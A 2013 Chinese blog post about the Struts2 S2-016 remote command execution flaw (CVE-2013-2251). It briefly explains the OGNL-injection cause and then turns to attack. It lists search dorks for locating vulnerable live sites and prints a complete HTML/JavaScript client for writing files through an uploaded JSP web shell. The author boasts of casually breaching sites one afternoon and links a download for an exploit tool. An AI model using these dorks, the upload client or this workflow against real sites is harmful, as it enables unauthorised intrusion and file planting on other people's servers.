A-A+

Struts2最新远程命令执行漏洞(s2-016)

2013年11月12日 渗透测试 暂无评论 阅读 3,979 次

17号,Struts2的官网公布了一个远程命令执行漏洞,紧接着各种版本的利用工具满天飞,直接可以爆网站物理路径。甚至root!该漏洞影响版本:Struts 2.0.0 – Struts 2.3.15, CVE编号为:CVE-2013-2251

漏洞产生原因的:

Struts2的DefaultActionMapper支持一种方法,可以使用”action:”, “redirect:” , “redirectAction:”对输入信息进行处理,从而改变前缀参数,这样操作的目的是方便表单中的操作。在2.3.15.1版本以前的struts2中,没有对”action:”, “redirect:” , “redirectAction:”等进行处理,导致ognl表达式可以被执行。

有兴趣的可以测试哈!

关键字:inurl:news.action           inurl:action?id=          inurl:index.action

然后通过jsp文件与客户端结合,上传!

提供一个测试客户端:

  1. <html>
  2. <head>
  3. <meta http-equiv="content-type" content="text/html;charset=utf-8">
  4. <title>jsp-园长</title>
  5. </head>
  6. <style>
  7. .main{width:980px;height:600px;margin:0 auto;}
  8. .url{width:300px;}
  9. .fn{width:60px;}
  10. .content{width:80%;height:60%;}
  11. </style>
  12. <script>
  13.   function upload(){
  14.     var url = document.getElementById('url').value,
  15.       content = document.getElementById('content').value,
  16.       fileName = document.getElementById('fn').value,
  17.       form = document.getElementById('fm');
  18.     if(url.length == 0){
  19.       alert("Url not allowd empty!");
  20.       return ;
  21.     }
  22.     if(content.length == 0){
  23.       alert("Content not allowd empty!");
  24.       return ;
  25.     }
  26.     if(fileName.length == 0){
  27.       alert("FileName not allowd empty!");
  28.       return ;
  29.     }
  30.     form.action = url;
  31.     form.submit();
  32.   }
  33. </script>
  34. <body>
  35. <div class="main">
  36.   <form id="fm" method="post">
  37.     URL:<input type="text" value="http://localhost/Struts2/css3.jsp" class="url" id="url"/>&nbsp;&nbsp;
  38.     FileName:<input type="text" name="f" value="css.jsp" class="fn" id="fn" />&nbsp;&nbsp;
  39.     <a href="javascript:upload();">Upload</a><br/>
  40.     <textarea id="content" class="content" name="t" ></textarea>
  41.   </form>
  42. </div>
  43. </body>
  44. </html>

这种漏洞现在还是很普遍的,足以说明站长对安全的重视度!下午没事干,随便试了哈,就有就爆出!

Struts2终结者下载:传送带

给我留言